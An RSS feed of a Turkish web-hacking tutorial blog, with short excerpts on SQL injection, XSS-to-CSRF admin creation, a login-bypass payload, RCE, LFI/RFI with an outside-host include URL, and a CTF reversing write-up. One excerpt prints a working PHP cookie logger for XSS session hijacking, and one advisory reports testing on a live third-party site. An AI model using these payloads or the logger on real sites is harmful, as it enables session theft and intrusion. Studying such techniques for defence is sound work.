<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom"><channel><title>diaryofinjector</title><link>https://diaryofinjector.com/</link><description>Recent content on diaryofinjector</description><generator>Hugo</generator><language>en</language><lastBuildDate>Fri, 19 Oct 2018 00:00:00 +0000</lastBuildDate><atom:link href="https://diaryofinjector.com/index.xml" rel="self" type="application/rss+xml"/><item><title>Sef Url - PDO Injection</title><link>https://diaryofinjector.com/posts/sef-url-pdo-injection/</link><pubDate>Fri, 19 Oct 2018 00:00:00 +0000</pubDate><guid>https://diaryofinjector.com/posts/sef-url-pdo-injection/</guid><description>&lt;p>Merhaba arkadaşlar bu yazımda pdo ve sef url injectionu anlatacağım. Videolarda genelde html injection olarak anlatılıyor aslında yanlış bir tanım olur sef url için. Site içinde seo url ve db bağlantısı olarak pdo kullanılmaktadır.&lt;/p>
&lt;p>&lt;img src="1.png" alt="SEF URL örnek sayfa">&lt;/p>
&lt;p>Şimdi urlnin sonuna bir tırnak atalım ve sorgumuzu inceleyelim.&lt;/p>
&lt;p>Sorgumuz aşağıdaki gibidir. Dışardan get olarak gelen &amp;ldquo;s&amp;rdquo; htaccess ile seo url ye dönüştürüp ekrana basıyor.&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-php" data-lang="php">&lt;span class="line">&lt;span class="cl">&lt;span class="nv">$s&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="nv">$_GET&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s2">&amp;#34;s&amp;#34;&lt;/span>&lt;span class="p">];&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="nv">$urn&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="nv">$db&lt;/span>&lt;span class="o">-&amp;gt;&lt;/span>&lt;span class="na">prepare&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s2">&amp;#34;SELECT * FROM referanslar where ref_seo=&amp;#39;&lt;/span>&lt;span class="si">$s&lt;/span>&lt;span class="s2">&amp;#39;&amp;#34;&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>Tırnak attık &lt;code>http://localhost/sefurl/ref/a-firmasi'&lt;/code>&lt;/p></description></item><item><title>XSS to CSRF</title><link>https://diaryofinjector.com/posts/xss-to-csrf/</link><pubDate>Fri, 30 Mar 2018 00:00:00 +0000</pubDate><guid>https://diaryofinjector.com/posts/xss-to-csrf/</guid><description>&lt;p>Merhaba arkadaşlar bu yazımı wordpress üzerinde anlatacağım. Wordpress üzerindeki basit bir xss&amp;rsquo;i csrf ye dönüştürüp yeni bir yönetici eklemeyi göstereceğim.&lt;/p>
&lt;p>CSRF - CROSS SITE REQUEST FORGERY
(Kullanıcının isteği dışında ve haberi olmadan dışarıdan müdahale)&lt;/p>
&lt;p>Bildiğiniz gibi wordpress&amp;rsquo;in csrf saldırılarına önlem olarak kullanıcı için oluşturduğu bir token vardır ve bu token&amp;rsquo;in sayfadaki input id&amp;rsquo;si &lt;code>_wpnonce&lt;/code>&amp;lsquo;tur. Gelen isteklerde bu token üretilenle uyuşmazsa işlem gerçekleştirilmez. Biz saldırıda wpnonce token&amp;rsquo;ını javascript ile alıp kendi post&amp;rsquo;umuzu yöneticinin haberi olmadan göndereceğiz. Bu istek normal şartlar altında SOP önleminden dolayı yapamayacağımız bir istek ancak burada XSS açığımızdan faydalanacağız. Bu sayede SOP önlemini bypasslamış olacağız.&lt;/p></description></item><item><title>Mysql Error Based Injection</title><link>https://diaryofinjector.com/posts/mysql-error-based-injection/</link><pubDate>Thu, 07 Dec 2017 00:00:00 +0000</pubDate><guid>https://diaryofinjector.com/posts/mysql-error-based-injection/</guid><description>&lt;p>Bu yazımda extractvalue error based ile login bölümünden sql injection yapacağız.&lt;/p>
&lt;p>&lt;img src="1.png" alt="Ana login giriş ekranı">&lt;/p>
&lt;p>Yukarıda gördüğünüz gibi normal bir login giriş bölümü şimdi rastgele birşeyler girelim.&lt;/p>
&lt;p>&lt;img src="2.png" alt="Rastgele değer girişi">&lt;/p>
&lt;p>Resimde gördüğünüz gibi hata verdi sql sorgumuzu inceleyelim;&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-sql" data-lang="sql">&lt;span class="line">&lt;span class="cl">&lt;span class="k">select&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="o">*&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="k">from&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="n">uyeler&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="k">where&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="n">username&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="s1">&amp;#39;asd&amp;#39;&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="k">and&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="n">password&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="s1">&amp;#39;asd&amp;#39;&lt;/span>&lt;span class="w">
&lt;/span>&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>şimdi bir de kullanıcı adı bölümüne: &lt;code>'=' 'or'&lt;/code> ile deniyelim.&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-sql" data-lang="sql">&lt;span class="line">&lt;span class="cl">&lt;span class="k">select&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="o">*&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="k">from&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="n">uyeler&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="k">where&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="n">username&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="s1">&amp;#39;&amp;#39;&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="s1">&amp;#39; &amp;#39;&lt;/span>&lt;span class="k">or&lt;/span>&lt;span class="s1">&amp;#39; &amp;#39;&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="k">and&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="n">password&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="s1">&amp;#39;&amp;#39;&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="s1">&amp;#39; &amp;#39;&lt;/span>&lt;span class="k">or&lt;/span>&lt;span class="s1">&amp;#39; &amp;#39;&lt;/span>&lt;span class="w">
&lt;/span>&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>yukarıdaki sorgudan anlaşılacağı gibi username=&amp;rsquo;&amp;rsquo; deki ve password=&amp;rsquo;&amp;rsquo; deki tırnakları aşmış sorguyu değiştirmiş oluyoruz böylece true dönüyor ve login oluyoruz.&lt;/p></description></item><item><title>Xss Session Hijacking Uygulama Örneği</title><link>https://diaryofinjector.com/posts/xss-session-hijacking/</link><pubDate>Tue, 24 Oct 2017 00:00:00 +0000</pubDate><guid>https://diaryofinjector.com/posts/xss-session-hijacking/</guid><description>&lt;p>Bu yazımızda basit bir iletişim forumundan ek bir güvenlik ve kontrol olmadan veri gönderimini kullanarak Xss Session Hijacking saldırısı düzenlemeyi anlatacağım.&lt;/p>
&lt;p>&lt;img src="1.png" alt="İletişim formu">&lt;/p>
&lt;p>Yukarıda bir iletişim formu var şimdi buradaki inputlara ve textarea&amp;rsquo;ya verileri giriyoruz ve tamperdata,burpsuite gibi araçlarla yakalayıp veriyi değiştireceğiz.&lt;/p>
&lt;p>&lt;img src="2.png" alt="TamperData ile verinin yakalanması">&lt;/p>
&lt;p>Verilerimiz gördüğünüz gibi şimdi bu verilere cookie loglayacağımız için loggerimizin adresini yazıyoruz.&lt;/p>
&lt;p>Php Kodu&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-php" data-lang="php">&lt;span class="line">&lt;span class="cl">&lt;span class="o">&amp;lt;?&lt;/span>&lt;span class="nx">php&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="nx">error_reporting&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="mi">0&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="nv">$cookie&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="nv">$_GET&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s2">&amp;#34;cookie&amp;#34;&lt;/span>&lt;span class="p">];&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="nv">$date&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="nx">date&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s2">&amp;#34;l ds of F Y h:i:s A&amp;#34;&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="nv">$user_agent&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="nv">$_SERVER&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s1">&amp;#39;HTTP_USER_AGENT&amp;#39;&lt;/span>&lt;span class="p">];&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="nv">$file&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="nx">fopen&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s1">&amp;#39;lob.txt&amp;#39;&lt;/span>&lt;span class="p">,&lt;/span>&lt;span class="s1">&amp;#39;a&amp;#39;&lt;/span>&lt;span class="p">);&lt;/span> &lt;span class="c1">// chmod 777 lob.txt
&lt;/span>&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1">&lt;/span>&lt;span class="nx">fwrite&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nv">$file&lt;/span>&lt;span class="p">,&lt;/span>&lt;span class="s2">&amp;#34;TARIH:&lt;/span>&lt;span class="si">$date&lt;/span>&lt;span class="s2"> || USER AGENT:&lt;/span>&lt;span class="si">$user_agent&lt;/span>&lt;span class="s2"> || COOKIE:&lt;/span>&lt;span class="si">$cookie&lt;/span>&lt;span class="s2"> &lt;/span>&lt;span class="se">\n&lt;/span>&lt;span class="s2">&amp;#34;&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="nx">fclose&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nv">$file&lt;/span>&lt;span class="p">);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="cp">?&amp;gt;&lt;/span>&lt;span class="err">
&lt;/span>&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>Javascript Kodu&lt;/p></description></item><item><title>Insert Bazlı Query'lerde SQL Injection</title><link>https://diaryofinjector.com/posts/insert-sql-injection/</link><pubDate>Sat, 17 Oct 2015 00:00:00 +0000</pubDate><guid>https://diaryofinjector.com/posts/insert-sql-injection/</guid><description>&lt;p>Bu yazımızda temelde &lt;strong>insert&lt;/strong> cümlesi kullanan web sayfalarında &lt;strong>SQL Injection&lt;/strong> saldırısı düzenlemeyi anlatacağım.&lt;/p>
&lt;p>&lt;strong>Insert cümlesi&lt;/strong> kullanan sayfalara örnek verecek olursak en güzel örnek register formları olacaktır. Bu yazımda kendi kodladığım bir &lt;strong>register formu&lt;/strong>nda &lt;strong>SQL Injection&lt;/strong> yapacağım.&lt;/p>
&lt;p>Formun &lt;strong>PHP kodu&lt;/strong> aşağıdaki gibidir:&lt;/p>
&lt;p>&lt;img src="0.png" alt="Register formunun PHP kodu">&lt;/p>
&lt;p>Kodumuz kullanıcıdan &lt;strong>kadi&lt;/strong>, &lt;strong>ad&lt;/strong>, &lt;strong>soyad&lt;/strong>, &lt;strong>email&lt;/strong> alarak &lt;strong>register işlemi&lt;/strong> gerçekleştirmektedir. Bu verileri &lt;strong>kullanıcı&lt;/strong> tablosuna &lt;strong>insert&lt;/strong> etmektedir.&lt;/p>
&lt;p>Formun görünümü aşağıdaki gibidir:&lt;/p>
&lt;p>&lt;img src="1.png" alt="Register formunun görünümü">&lt;/p>
&lt;p>Verileri girip &lt;strong>kaydol&lt;/strong> dediğinizde &amp;ldquo;&lt;strong>Kayıt eklendi&lt;/strong>&amp;rdquo; demektedir.&lt;/p></description></item><item><title>Remote Command Execution (RCE)</title><link>https://diaryofinjector.com/posts/remote-command-execution-rce/</link><pubDate>Tue, 22 Sep 2015 00:00:00 +0000</pubDate><guid>https://diaryofinjector.com/posts/remote-command-execution-rce/</guid><description>&lt;p>Bu &lt;strong>güvenlik açığı&lt;/strong> tüm türler arasında &lt;strong>en tehlikelisidir&lt;/strong> ve genelde &lt;strong>10&lt;/strong> üzerinden &lt;strong>10&lt;/strong> ile derecelendirilir. Bulmak zordur. Komut &lt;strong>çalıştırma açığı&lt;/strong> aranan scriptte, &lt;strong>komut çalıştıran bi kod parçası&lt;/strong> olması gerekir haliyle. Bu yüzden bulmak &lt;strong>zordur&lt;/strong>, çünkü çok gerekmedikçe &lt;strong>webmasterlar&lt;/strong> kolay kolay &lt;strong>komut çalıştıran kodlar yazmaz&lt;/strong>. Ancak her sistemin &lt;strong>her katmanında&lt;/strong> bu tip açıklara rastlanabilir. Biz burada &lt;strong>web hacking&amp;rsquo;deki&lt;/strong> mevzusundan bahsedeceğiz.&lt;/p>
&lt;p>Önce &amp;ldquo;&lt;strong>remote code execution&lt;/strong>&amp;rdquo; ve &amp;ldquo;&lt;strong>remote command execution&lt;/strong>&amp;rdquo; farklarından bahsedeceğim.&lt;/p>
&lt;p>&lt;strong>Remote code execution&lt;/strong> demek, &lt;strong>script&lt;/strong> üzerinden &lt;strong>kod çalıştırma açığı&lt;/strong> demek. Bilirsiniz &lt;code>eval()&lt;/code> fonksiyonu ve bu fonksiyonla &lt;strong>aynı mantıkla&lt;/strong> çalışan veya &lt;strong>bünyesinde bu fonksiyonu çağıran&lt;/strong> fonksiyonlar &lt;strong>remote code execution&lt;/strong>&amp;lsquo;a sebebiyet vermektedir. &lt;strong>Eval&lt;/strong> desteği olan &lt;strong>her web programlama dilinde&lt;/strong> karşılaşılabilir ve &lt;strong>o script dilinde yazacağınız kodları&lt;/strong> çalıştırabilmenize imkan sağlar. Ama &amp;ldquo;&lt;strong>remote command execution&lt;/strong>&amp;rdquo; farklıdır. Bu açık türü ise bu tür script dilleri üzerinden &lt;strong>işletim sistemine yapılan çağrıları&lt;/strong> kullanır. Yani &lt;strong>script kodları değil&lt;/strong>, doğrudan &lt;strong>cmd/shell komutları&lt;/strong> çalıştırırsınız.&lt;/p></description></item><item><title>Tırnak Işareti Filtreli Scriptlerde SQL Injection, htmlspecialchars Bypass</title><link>https://diaryofinjector.com/posts/tirnak-filtreli-sql-injection/</link><pubDate>Sun, 02 Aug 2015 00:00:00 +0000</pubDate><guid>https://diaryofinjector.com/posts/tirnak-filtreli-sql-injection/</guid><description>&lt;p>Bildiğiniz gibi &lt;strong>Ahmet Çelik(t4cs1zkr4L)&lt;/strong> kardeşim &lt;strong>Avrasya Üniversitesi Bilişim Topluluğunun&lt;/strong> başkanlığını yürütmekte. Topluluğun dergi çıkarmasına öncülük eden &lt;strong>laz&lt;/strong> bana da bi makale yazdırdı. Onu sizinle paylaşayım dedim.&lt;/p>
&lt;p>Bunlar da &lt;strong>dergiden&lt;/strong> resimler:&lt;/p>
&lt;p>&lt;img src="1.jpg" alt="Dergiden resim 1">&lt;/p>
&lt;p>&lt;img src="2.jpg" alt="Dergiden resim 2">&lt;/p>
&lt;p>Bildiğiniz gibi &lt;strong>SQL&lt;/strong>&amp;lsquo;de &lt;strong>String&lt;/strong> tipi veri karşılaştırmalarında, karşılaştırılacak veri tırnak işaretleri arasında yazılır &lt;strong>(&amp;quot; , &amp;lsquo;).&lt;/strong> Aslında bu hemen hemen tüm bilgisayar dillerinde bu şekildedir. String tipi veriler &lt;strong>tırnak işaretleri&lt;/strong> arasında eşitlenir. Ama &lt;strong>int tipi&lt;/strong> veriler için bu kullanım yoktur. Doğrudan sayıyı yazarak eşitlersiniz.&lt;/p></description></item><item><title>Win x86 Reverse Engineering</title><link>https://diaryofinjector.com/posts/win-x86-reverse-engineering/</link><pubDate>Thu, 26 Mar 2015 00:00:00 +0000</pubDate><guid>https://diaryofinjector.com/posts/win-x86-reverse-engineering/</guid><description>&lt;p>Bu yazımızda &amp;ldquo;&lt;strong>ringzer0&lt;/strong>&amp;rdquo; &lt;strong>ctf&lt;/strong>&amp;lsquo;de &amp;ldquo;&lt;strong>Binaries&lt;/strong>&amp;rdquo; kategorisinde sorulmuş &amp;ldquo;&lt;strong>Windows x86 reversing is cool&lt;/strong>&amp;rdquo; başlıklı sorunun çözümünü anlatacağız.&lt;/p>
&lt;p>Sorudan da anlaşıldığı gibi elimizde bir &lt;strong>Winx86&lt;/strong> &lt;strong>exe&lt;/strong> var ve bunu &lt;strong>reverse&lt;/strong> ederek &lt;strong>flag&amp;rsquo;i&lt;/strong> elde etmeye çalışacağız.&lt;/p>
&lt;p>&lt;strong>Exe&amp;rsquo;yi&lt;/strong> ilk çalıştırdığımızda ve &lt;strong>Key&lt;/strong> değerini girdiğimizde ekran görüntüsü şu şekilde olmaktadır:&lt;/p>
&lt;p>&lt;img src="1.png" alt="Yanlış key girişi sonrası ekran görüntüsü">&lt;/p>
&lt;p>gördüğünüz gibi keyi &lt;strong>yanlış&lt;/strong> girdiğimiz için &amp;ldquo;&lt;strong>Wrong Key!&lt;/strong>&amp;rdquo; demekte.&lt;/p>
&lt;p>Önce &lt;strong>exe&lt;/strong> üzerinde &lt;strong>string&amp;rsquo;leri&lt;/strong> vs. kontrol ettik ancak &lt;strong>Flag yoktu&lt;/strong>. Geriye tek bir çare kaldı, &lt;strong>dinamik debug&lt;/strong> yapmak.&lt;/p></description></item><item><title>LFI/RFI ve Arbitrary File Read Açıkları</title><link>https://diaryofinjector.com/posts/lfi-rfi-arbitrary-file-read/</link><pubDate>Tue, 18 Nov 2014 00:00:00 +0000</pubDate><guid>https://diaryofinjector.com/posts/lfi-rfi-arbitrary-file-read/</guid><description>&lt;h3 id="lfirfi-ve-arbitrary-file-read-açıkları">LFI/RFI ve Arbitrary File Read Açıkları&lt;/h3>
&lt;p>Bu tür açıklar her script dilinde görülebilir fakat en yaygın olarak görülen &amp;ldquo;php&amp;rdquo; dir. Biz örneklerimizi &amp;ldquo;php&amp;rdquo; dilinde vereceğiz. Zaten kullanım bakımından her dilde aynı yöntemler izlenmektedir. &lt;strong>LFI&lt;/strong> &amp;ldquo;&lt;strong>local file include&lt;/strong>&amp;rdquo; yani &amp;ldquo;&lt;strong>yerel dosya çağırma&lt;/strong>&amp;rdquo; manasına gelmekte. &lt;strong>RFI&lt;/strong> (&lt;strong>remote file include&lt;/strong>) ise aynı işin yerel dosya değil uzak server&amp;rsquo;daki bir dosyayı çağırarak yapılanı.&lt;/p>
&lt;p>&lt;strong>Php&lt;/strong> &amp;ldquo;&lt;strong>wrapper&lt;/strong>&amp;rdquo; özelliği ile örneğin: &amp;ldquo;&lt;code>http://site.com/index.php?page=http://asd.com/x.txt&lt;/code>&amp;rdquo; şeklinde bir include yapmaya çalıştığınızda, php bu dosyanın bir &amp;ldquo;&lt;strong>url&lt;/strong>&amp;rdquo; olduğunu algılar ve url üzerinden dosyayı include eder.&lt;/p></description></item><item><title>MyBB ChangUonDyu Chatbox XSS</title><link>https://diaryofinjector.com/posts/mybb-chatbox-xss/</link><pubDate>Mon, 10 Nov 2014 00:00:00 +0000</pubDate><guid>https://diaryofinjector.com/posts/mybb-chatbox-xss/</guid><description>&lt;p>&lt;strong>Versions Affected&lt;/strong>: I.D.K.(never tested but works on the latest one)&lt;/p>
&lt;p>&lt;strong>Vulnerable file:&lt;/strong>&lt;/p>
&lt;p>&amp;ldquo;&lt;strong>chatbox/message.php&lt;/strong>&amp;rdquo;&lt;/p>
&lt;p>on lines&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-php" data-lang="php">&lt;span class="line">&lt;span class="cl">&lt;span class="mi">54&lt;/span>&lt;span class="o">:&lt;/span> &lt;span class="nv">$shout&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s1">&amp;#39;color&amp;#39;&lt;/span>&lt;span class="p">]&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="nx">strip_tags&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nv">$shout&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s1">&amp;#39;color&amp;#39;&lt;/span>&lt;span class="p">]);&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="mi">55&lt;/span>&lt;span class="o">:&lt;/span> &lt;span class="nv">$shout&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s1">&amp;#39;font&amp;#39;&lt;/span>&lt;span class="p">]&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="nx">strip_tags&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nv">$shout&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s1">&amp;#39;font&amp;#39;&lt;/span>&lt;span class="p">]);&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>U shall use &lt;code>htmlspecialchars($shout['color'],ENT_QUOTES);&lt;/code> or similar instead of &lt;strong>strip_tags()&lt;/strong>. Strip_tags just blocks html tags, doesnt do anything for quotation marks. That is why it was named &lt;strong>&amp;ldquo;strip_tags&amp;rdquo;&lt;/strong> ;)&lt;/p>
&lt;p>&lt;strong>Tested on madleets.com;&lt;/strong>&lt;/p>
&lt;p>&lt;strong>Sorry guys dont take it personal ;)&lt;/strong>&lt;/p>
&lt;p>&lt;strong>Example attack:&lt;/strong>
Send a message on chatbox with editing selected font value like this(you can use inspect element options on browsers):&lt;/p></description></item><item><title>XSS Açıkları ve Kullanma Yöntemleri</title><link>https://diaryofinjector.com/posts/xss-aciklari/</link><pubDate>Wed, 06 Aug 2014 00:00:00 +0000</pubDate><guid>https://diaryofinjector.com/posts/xss-aciklari/</guid><description>&lt;p>Bu yazıda &lt;strong>XSS&lt;/strong> (&lt;strong>Cross Site Scripting - Çapraz Siteden Betik Çalıştırma&lt;/strong>) saldırılarının kullanımından bahsedeceğim. Bulma yöntemlerini az çok biliyorsunuzdur zaten.&lt;/p>
&lt;p>Bu açık türü de nerdeyse tüm web application açık türleri gibi, &lt;strong>Input Validation&lt;/strong> eksikliğinden kaynaklanır.&lt;/p>
&lt;p>Yani dışarıdan kullanıcının girebildiği parametrelerin filtrelenmemesinden kaynaklanır. Bildiğiniz gibi sql injection da bu sebeple ortaya çıkmaktadır. Ama bu saldırı türünde sayfada &amp;ldquo;&lt;strong>html&lt;/strong>&amp;rdquo; veya &amp;ldquo;&lt;strong>javascript&lt;/strong>&amp;rdquo; kodları çalıştırmak mümkündür.&lt;/p>
&lt;p>&lt;strong>Açığa sebebiyet verecek karakterler&lt;/strong> webmasterın sayfayı kodlarken ne şekilde kodladığına göre değişir ancak en yaygınları ( &lt;code>&amp;quot;&lt;/code> , &lt;code>'&lt;/code> , &lt;code>&amp;lt;&lt;/code> , &lt;code>&amp;gt;&lt;/code> ) karakterleridir.&lt;/p></description></item></channel></rss>